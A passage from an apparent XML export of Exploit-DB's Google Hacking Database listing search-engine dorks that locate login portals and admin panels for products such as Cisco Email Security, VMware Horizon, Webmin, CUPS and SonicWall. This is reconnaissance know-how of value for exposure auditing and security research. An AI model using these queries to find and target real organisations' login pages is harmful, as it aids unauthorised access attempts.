<edb></edb>
<date>2020-03-05</date>
<author>yunaranyancat</author>
</entry>
<entry>
<id>5376</id>
<link>https://www.exploit-db.com/ghdb/5376</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/login.php?do=login&quot;</shortDescription>
<textualDescription>Login page :
inurl:&quot;/login.php?do=login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/login.php?do=login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/login.php?do=login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4322</id>
<link>https://www.exploit-db.com/ghdb/4322</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/login/login.html&quot; intitle:&quot;Greenbone Security Assistant&quot;</shortDescription>
<textualDescription>OpenVAS login page,
by neon</textualDescription>
<query>inurl:&quot;/login/login.html&quot; intitle:&quot;Greenbone Security Assistant&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/login/login.html&quot; intitle:&quot;Greenbone Security Assistant&quot;</querystring>
<edb></edb>
<date>2016-08-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>6484</id>
<link>https://www.exploit-db.com/ghdb/6484</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/login?csrfkey=&quot; intitle:&quot;cisco email security&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/login?csrfkey=&quot; intitle:&quot;cisco email security&quot;
# CISCO Email Security Appliance login portals.
# Date: 18/08/2020
# Exploit Author: Adithya Chandra
Thanks and Best Regards,
Adithya Chandra
</textualDescription>
<query>inurl:&quot;/login?csrfkey=&quot; intitle:&quot;cisco email security&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/login?csrfkey=&quot; intitle:&quot;cisco email security&quot;</querystring>
<edb></edb>
<date>2020-08-19</date>
<author>Adithya Chandra</author>
</entry>
<entry>
<id>4841</id>
<link>https://www.exploit-db.com/ghdb/4841</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/logon.aspx?ReturnUrl=&quot;</shortDescription>
<textualDescription>Several login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;/logon.aspx?ReturnUrl=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/logon.aspx?ReturnUrl=&quot;</querystring>
<edb></edb>
<date>2018-06-05</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6537</id>
<link>https://www.exploit-db.com/ghdb/6537</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/mifs/user&quot;</shortDescription>
<textualDescription>Google dork description: Mobileiron MDM Login Portals
Google Search: inurl:&quot;/mifs/user&quot;
Submitted by: Alfie
Twitter: https://twitter.com/emenalf
--
Regards,
Alfie.
the-infosec.com
</textualDescription>
<query>inurl:&quot;/mifs/user&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/mifs/user&quot;</querystring>
<edb></edb>
<date>2020-09-14</date>
<author>Alfie</author>
</entry>
<entry>
<id>3909</id>
<link>https://www.exploit-db.com/ghdb/3909</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/module.php/core/loginuserpass.php&quot;</shortDescription>
<textualDescription>Finds SimpleSAMLphp login pages.
- Andy G - twitter.com/vxhex</textualDescription>
<query>inurl:&quot;/module.php/core/loginuserpass.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/module.php/core/loginuserpass.php&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4635</id>
<link>https://www.exploit-db.com/ghdb/4635</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/moodle/login/index.php&quot;</shortDescription>
<textualDescription>Finds Moodle Login pages
Dxtroyer
</textualDescription>
<query>inurl:&quot;/moodle/login/index.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/moodle/login/index.php&quot;</querystring>
<edb></edb>
<date>2017-12-11</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>5097</id>
<link>https://www.exploit-db.com/ghdb/5097</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/my-account-login&quot; | allintext:&quot;My Account&quot;</shortDescription>
<textualDescription>Category : Pages containing login portals
Description : Dork for finding login portals where well known company
websites hosted on famous hosting provider such as Akamai, Amazon,
Microsoft Azure, Leaseweb, weebly, Rackspace, OVH SAS, etc.
Dork : inurl:&quot;/my-account-login&quot; | allintext:&quot;My Account&quot;
Also try : inurl:&quot;/my-account/login&quot;
Date : 10/2/2019
Author : Manish Bhandarkar
Blog : https://hackingforsecurity.blogspot.com/
</textualDescription>
<query>inurl:&quot;/my-account-login&quot; | allintext:&quot;My Account&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/my-account-login&quot; | allintext:&quot;My Account&quot;</querystring>
<edb></edb>
<date>2019-02-12</date>
<author>Manish Bhandarkar</author>
</entry>
<entry>
<id>4274</id>
<link>https://www.exploit-db.com/ghdb/4274</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/owncloud/index.php&quot; -github -forum</shortDescription>
<textualDescription>Google dork Description: inurl:&quot;/owncloud/index.php&quot; -github -forum
Google search: inurl:&quot;/owncloud/index.php&quot; -github -forum
Date: 2016-29-04
Author: khajj16
Summary: Owncloud login portal.</textualDescription>
<query>inurl:&quot;/owncloud/index.php&quot; -github -forum</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/owncloud/index.php&quot; -github -forum</querystring>
<edb></edb>
<date>2016-04-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5627</id>
<link>https://www.exploit-db.com/ghdb/5627</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/password.php&quot; intitle:&quot;Forgot your password&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/password.php&quot; intitle:&quot;Forgot your password&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/password.php&quot; intitle:&quot;Forgot your password&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/password.php&quot; intitle:&quot;Forgot your password&quot;</querystring>
<edb></edb>
<date>2019-11-06</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5509</id>
<link>https://www.exploit-db.com/ghdb/5509</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/phpmyadmin/user_password.php&quot; -inurl:git</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/phpmyadmin/user_password.php&quot; -inurl:git
site:*/phpmyadmin/sql.php
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/phpmyadmin/user_password.php&quot; -inurl:git</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/phpmyadmin/user_password.php&quot; -inurl:git</querystring>
<edb></edb>
<date>2019-09-10</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5007</id>
<link>https://www.exploit-db.com/ghdb/5007</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/phpsqlitecms/cms/index.php&quot;</shortDescription>
<textualDescription>phpsqlitecms login panel
ManhNho
</textualDescription>
<query>inurl:&quot;/phpsqlitecms/cms/index.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/phpsqlitecms/cms/index.php&quot;</querystring>
<edb></edb>
<date>2018-11-01</date>
<author>ManhNho</author>
</entry>
<entry>
<id>6496</id>
<link>https://www.exploit-db.com/ghdb/6496</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/portal/webclient&quot; intitle:&quot;VMware Horizon&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/portal/webclient&quot; intitle:&quot;VMware Horizon&quot;
# Description: This dork will list out all the VMware Horizon login portals.
# Date: 25/08/2020
# Exploit Author: Varsha V Rajan
Thanks &amp; Regards,
Varsha V Rajan
</textualDescription>
<query>inurl:&quot;/portal/webclient&quot; intitle:&quot;VMware Horizon&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/portal/webclient&quot; intitle:&quot;VMware Horizon&quot;</querystring>
<edb></edb>
<date>2020-08-26</date>
<author>Varsha V Rajan</author>
</entry>
<entry>
<id>5542</id>
<link>https://www.exploit-db.com/ghdb/5542</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/prweb/prwebLDAP1/&quot;</shortDescription>
<textualDescription>Pega systems: login portal
inurl:&quot;/prweb/prwebLDAP1/&quot;
Sravan7s
</textualDescription>
<query>inurl:&quot;/prweb/prwebLDAP1/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/prweb/prwebLDAP1/&quot;</querystring>
<edb></edb>
<date>2019-09-17</date>
<author>Sravan7s</author>
</entry>
<entry>
<id>6492</id>
<link>https://www.exploit-db.com/ghdb/6492</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/rpAuth.html&quot; &quot;ZyWALL&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/rpAuth.html&quot; &quot;ZyWALL&quot;
# ZyWALL Series Firewall login portals.
# Date: 24/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;/rpAuth.html&quot; &quot;ZyWALL&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/rpAuth.html&quot; &quot;ZyWALL&quot;</querystring>
<edb></edb>
<date>2020-08-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4994</id>
<link>https://www.exploit-db.com/ghdb/4994</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/saml2?SAMLRequest=&quot;</shortDescription>
<textualDescription>Login portals using SAML
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
@brulliant
</textualDescription>
<query>inurl:&quot;/saml2?SAMLRequest=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/saml2?SAMLRequest=&quot;</querystring>
<edb></edb>
<date>2018-10-22</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4787</id>
<link>https://www.exploit-db.com/ghdb/4787</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/SAMLLogin/&quot; -github</shortDescription>
<textualDescription>Security Assertion Markup Language (SAML) Login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;/SAMLLogin/&quot; -github</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/SAMLLogin/&quot; -github</querystring>
<edb></edb>
<date>2018-04-18</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7940</id>
<link>https://www.exploit-db.com/ghdb/7940</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/sap/admin/public&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/sap/admin/public&quot;
# Pages Containing Login Portals
# Date: 18/06/2021
# Exploit Author: Pablo Salinas</textualDescription>
<query>inurl:&quot;/sap/admin/public&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/sap/admin/public&quot;</querystring>
<edb></edb>
<date>2022-06-20</date>
<author>Pablo Salinas</author>
</entry>
<entry>
<id>8136</id>
<link>https://www.exploit-db.com/ghdb/8136</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/sap/bc/gui/sap/its/webgui?sap-client=SAP*&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/sap/bc/gui/sap/its/webgui?sap-client=SAP*&quot;
# Pages Containing Login Portals
# Date:06/04/2023
# Exploit Author: Leonardo Venegas</textualDescription>
<query>inurl:&quot;/sap/bc/gui/sap/its/webgui?sap-client=SAP*&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/sap/bc/gui/sap/its/webgui?sap-client=SAP*&quot;</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Leonardo Venegas</author>
</entry>
<entry>
<id>3870</id>
<link>https://www.exploit-db.com/ghdb/3870</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/secure/login.aspx&quot;</shortDescription>
<textualDescription>#Summary: Several Web Pages Login Portal
#Category: Pages containing login portals
#Author: g00gl3 5c0u7</textualDescription>
<query>inurl:&quot;/secure/login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/secure/login.aspx&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>5511</id>
<link>https://www.exploit-db.com/ghdb/5511</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/SecureAuth.aspx&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/SecureAuth.aspx&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/SecureAuth.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/SecureAuth.aspx&quot;</querystring>
<edb></edb>
<date>2019-09-10</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4435</id>
<link>https://www.exploit-db.com/ghdb/4435</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/SecureAuth1&quot;</shortDescription>
<textualDescription>SecureAuth
Logins, Password Resets
inurl:&quot;/SecureAuth1&quot; --(Replace number from 1-100)
-Xploit
</textualDescription>
<query>inurl:&quot;/SecureAuth1&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/SecureAuth1&quot;</querystring>
<edb></edb>
<date>2017-04-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4330</id>
<link>https://www.exploit-db.com/ghdb/4330</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/sgdadmin/&quot; Secure Global Desktop</shortDescription>
<textualDescription>Oracle Secure Global Desktop Console and Administrator Help.
&quot;https://sgd&quot;</textualDescription>
<query>inurl:&quot;/sgdadmin/&quot; Secure Global Desktop</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/sgdadmin/&quot; Secure Global Desktop</querystring>
<edb></edb>
<date>2016-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>5210</id>
<link>https://www.exploit-db.com/ghdb/5210</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/Shop/auth/login&quot;</shortDescription>
<textualDescription>Category : Pages containing login portals
Description : Dork for finding login portals
Dork : inurl:&quot;/Shop/auth/login&quot;
Date : 11/5/2019
Author : Manish Bhandarkar
Blog : https://hackingforsecurity.blogspot.com/
</textualDescription>
<query>inurl:&quot;/Shop/auth/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/Shop/auth/login&quot;</querystring>
<edb></edb>
<date>2019-05-13</date>
<author>Manish Bhandarkar</author>
</entry>
<entry>
<id>5592</id>
<link>https://www.exploit-db.com/ghdb/5592</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/showLogin.cc?isMobile=false&quot;</shortDescription>
<textualDescription>Login portals</textualDescription>
<query>inurl:&quot;/showLogin.cc?isMobile=false&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/showLogin.cc?isMobile=false&quot;</querystring>
<edb></edb>
<date>2019-10-21</date>
<author>HackingHomebrewer</author>
</entry>
<entry>
<id>4504</id>
<link>https://www.exploit-db.com/ghdb/4504</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/siteadmin/index.php&quot;</shortDescription>
<textualDescription>Finds admin control panels
Dxtroyer</textualDescription>
<query>inurl:&quot;/siteadmin/index.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/siteadmin/index.php&quot;</querystring>
<edb></edb>
<date>2017-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1353</id>
<link>https://www.exploit-db.com/ghdb/1353</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/slxweb.dll/external?name=(custportal|webticketcust)&quot;</shortDescription>
<textualDescription>Customer login pages&quot;SalesLogix is the Customer Relationship Management Solution that drives sales performance in small to Medium-sized businesses through Sales, Marketing, and Customer Support automation and back-officeintegration.&quot;</textualDescription>
<query>inurl:&quot;/slxweb.dll/external?name=(custportal|webticketcust)&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%22%2Fslxweb.dll%2Fexternal%3Fname%3D%28custportal%7Cwebticketcust%29%22</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>8254</id>
<link>https://www.exploit-db.com/ghdb/8254</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/spotfire/login.html&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/spotfire/login.html&quot;
# Pages Containing Login Portals
# Date: 16/10/2023
# Exploit Chinmay Divekar</textualDescription>
<query>inurl:&quot;/spotfire/login.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/spotfire/login.html&quot;</querystring>
<edb></edb>
<date>2023-10-16</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>7008</id>
<link>https://www.exploit-db.com/ghdb/7008</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/sslvpn_logon.shtml&quot; intitle:&quot;User Authentication&quot; &quot;WatchGuard Technologies&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/sslvpn_logon.shtml&quot; intitle:&quot;User
Authentication&quot; &quot;WatchGuard Technologies&quot;
# Pages Containing Login Portals
# Date: 21/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>inurl:&quot;/sslvpn_logon.shtml&quot; intitle:&quot;User Authentication&quot; &quot;WatchGuard Technologies&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/sslvpn_logon.shtml&quot; intitle:&quot;User Authentication&quot; &quot;WatchGuard Technologies&quot;</querystring>
<edb></edb>
<date>2021-06-25</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>4764</id>
<link>https://www.exploit-db.com/ghdb/4764</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/startSSO.ping?&quot; -stackoverflow.com</shortDescription>
<textualDescription>Pages containing Ping Identity®'s and PingFederate® login portals mainly
used by high profiled companies
Bruno Schmid
</textualDescription>
<query>inurl:&quot;/startSSO.ping?&quot; -stackoverflow.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/startSSO.ping?&quot; -stackoverflow.com</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7044</id>
<link>https://www.exploit-db.com/ghdb/7044</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/tips/tipsLogin.action&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/tips/tipsLogin.action&quot;
# Pages Containing Login Portals
# Exploit Author: s Thakur</textualDescription>
<query>inurl:&quot;/tips/tipsLogin.action&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/tips/tipsLogin.action&quot;</querystring>
<edb></edb>
<date>2021-07-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7152</id>
<link>https://www.exploit-db.com/ghdb/7152</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/userportal/webpages/myaccount/login.jsp&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/userportal/webpages/myaccount/login.jsp&quot;
# Pages Containing Login Portals
# Date: 01/09/2021
# Exploit Author: J. Igor Melo
</textualDescription>
<query>inurl:&quot;/userportal/webpages/myaccount/login.jsp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/userportal/webpages/myaccount/login.jsp&quot;</querystring>
<edb></edb>
<date>2021-09-02</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5520</id>
<link>https://www.exploit-db.com/ghdb/5520</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/usp-core/app/authUpdate&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/usp-core/app/authUpdate&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/usp-core/app/authUpdate&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/usp-core/app/authUpdate&quot;</querystring>
<edb></edb>
<date>2019-09-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5254</id>
<link>https://www.exploit-db.com/ghdb/5254</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/vpn/tmindex.html&quot; vpn</shortDescription>
<textualDescription>Netscaler &amp; Citrix Gateway VPN login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;/vpn/tmindex.html&quot; vpn</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/vpn/tmindex.html&quot; vpn</querystring>
<edb></edb>
<date>2019-06-07</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4075</id>
<link>https://www.exploit-db.com/ghdb/4075</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/wap/LoginPolicy.jsp&quot;</shortDescription>
<textualDescription>Stoneware webnetwork Cloud
Allows for Portal Cloud login.
-Xploit </textualDescription>
<query>inurl:&quot;/wap/LoginPolicy.jsp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wap/LoginPolicy.jsp&quot;</querystring>
<edb></edb>
<date>2015-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>5676</id>
<link>https://www.exploit-db.com/ghdb/5676</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/webis/webis_login.html&quot;</shortDescription>
<textualDescription>inurl:&quot;/webis/webis_login.html&quot;
This dork found checkpoint login panel.
Author : Ismail Tasdelen
</textualDescription>
<query>inurl:&quot;/webis/webis_login.html&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/webis/webis_login.html&quot;</querystring>
<edb></edb>
<date>2019-12-30</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>5607</id>
<link>https://www.exploit-db.com/ghdb/5607</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;/wp-login.php?action=lostpassword&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;/wp-login.php?action=lostpassword&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;/wp-login.php?action=lostpassword&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-login.php?action=lostpassword&quot;</querystring>
<edb></edb>
<date>2019-10-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>771</id>
<link>https://www.exploit-db.com/ghdb/771</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;1220/parse_xml.cgi?&quot;</shortDescription>
<textualDescription>Quicktime streaming server is uhhhhh.....well it's a streaming server and it can be managed via http. No need to say more. Darwin Streaming Server is the opensource version (for *NUX os's).Some are pass protected, others not.</textualDescription>
<query>inurl:&quot;1220/parse_xml.cgi?&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%221220%2Fparse_xml%22</querystring>
<edb></edb>
<date>2004-12-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>822</id>
<link>https://www.exploit-db.com/ghdb/822</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;631/admin&quot; (inurl:&quot;op=*&quot;) | (intitle:CUPS)</shortDescription>
<textualDescription>Administration pages for CUPS, The Common UNIX Printing System. Most are password protected.</textualDescription>
<query>inurl:&quot;631/admin&quot; (inurl:&quot;op=*&quot;) | (intitle:CUPS)</query>
<querystring>https://www.google.com/search?q=inurl:%22631/admin%22+(inurl:%22op%3D*%22)+%7C+(intitle:CUPS)+&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-01-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4212</id>
<link>https://www.exploit-db.com/ghdb/4212</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;8000&quot; inurl:&quot;login&quot;</shortDescription>
<textualDescription>Login forms. Mostly ftp.
Google dork:
inurl:&quot;8000&quot; inurl:&quot;login&quot;
D0bby</textualDescription>
<query>inurl:&quot;8000&quot; inurl:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;8000&quot; inurl:&quot;login&quot;</querystring>
<edb></edb>
<date>2016-03-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>168</id>
<link>https://www.exploit-db.com/ghdb/168</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;:10000&quot; intext:webmin</shortDescription>
<textualDescription>Webmin is a html admin interface for Unix boxes. It is run on a proprietary web server listening on the default port of 10000.</textualDescription>
<query>inurl:&quot;:10000&quot; intext:webmin</query>
<querystring>https://www.google.com/search?q=inurl%3A%22%3A10000%22+intext%3Awebmin</querystring>
<edb></edb>
<date>2004-04-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4582</id>
<link>https://www.exploit-db.com/ghdb/4582</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;:8006&quot; and intext:&quot;Proxmox VE Login&quot;</shortDescription>
<textualDescription>Login portal to Proxmox Virtual Environment.
---
@verovan</textualDescription>
<query>inurl:&quot;:8006&quot; and intext:&quot;Proxmox VE Login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;:8006&quot; and intext:&quot;Proxmox VE Login&quot;</querystring>
<edb></edb>
<date>2017-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>5683</id>
<link>https://www.exploit-db.com/ghdb/5683</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;:8080/login&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;:8080/login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;:8080/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;:8080/login&quot;</querystring>
<edb></edb>
<date>2020-01-06</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5687</id>
<link>https://www.exploit-db.com/ghdb/5687</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;:8080/login.jsp?os_destination=&quot;</shortDescription>
<textualDescription>Login Portal:
inurl:&quot;:8080/login.jsp?os_destination=&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:&quot;:8080/login.jsp?os_destination=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;:8080/login.jsp?os_destination=&quot;</querystring>
<edb></edb>
<date>2020-01-09</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>818</id>
<link>https://www.exploit-db.com/ghdb/818</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;Activex/default.htm&quot; &quot;Demo&quot;</shortDescription>
<textualDescription>This search will reveal the active X plugin page that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web.</textualDescription>
<query>inurl:&quot;Activex/default.htm&quot; &quot;Demo&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22Activex%2Fdefault.htm%22+%22Demo%22</querystring>
<edb></edb>
<date>2005-01-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>8021</id>
<link>https://www.exploit-db.com/ghdb/8021</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;admin/default.aspx&quot;</shortDescription>
<textualDescription> # Google Dork: inurl:&quot;admin/default.aspx&quot;
# Category: Pages Containing Login Portals
# Date: 07/08/2022
# Exploit Author: Payal Yedhu
</textualDescription>
<query>inurl:&quot;admin/default.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;admin/default.aspx&quot;</querystring>
<edb></edb>
<date>2022-08-17</date>
<author>Payal Yedhu</author>
</entry>
<entry>
<id>7089</id>
<link>https://www.exploit-db.com/ghdb/7089</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;admin/public/login&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;admin/public/login&quot;
# Pages Containing Login Portals
# Date: 23/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>inurl:&quot;admin/public/login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;admin/public/login&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>8232</id>
<link>https://www.exploit-db.com/ghdb/8232</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;adminLogin/&quot; intitle:&quot;Admin Panel&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;adminLogin/&quot; intitle:&quot;Admin Panel&quot;
# Pages Containing Login Portals
# Date: 11/09/2023
# Exploit Author: Jose Rivas Aka. Bl4cksku11
</textualDescription>
<query>inurl:&quot;adminLogin/&quot; intitle:&quot;Admin Panel&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;adminLogin/&quot; intitle:&quot;Admin Panel&quot;</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Jose Rivas Aka. Bl4cksku11</author>
</entry>
<entry>
<id>5567</id>
<link>https://www.exploit-db.com/ghdb/5567</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;apex/f?p=&quot;</shortDescription>
<textualDescription>Login portals</textualDescription>
<query>inurl:&quot;apex/f?p=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;apex/f?p=&quot;</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Ibad Shah</author>
</entry>
<entry>
<id>5755</id>
<link>https://www.exploit-db.com/ghdb/5755</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;auth.html&quot; intitle:&quot;SonicWall&quot;</shortDescription>
<textualDescription>Find sonicwall appliance login pages
--
*Hilary Soita.*
</textualDescription>
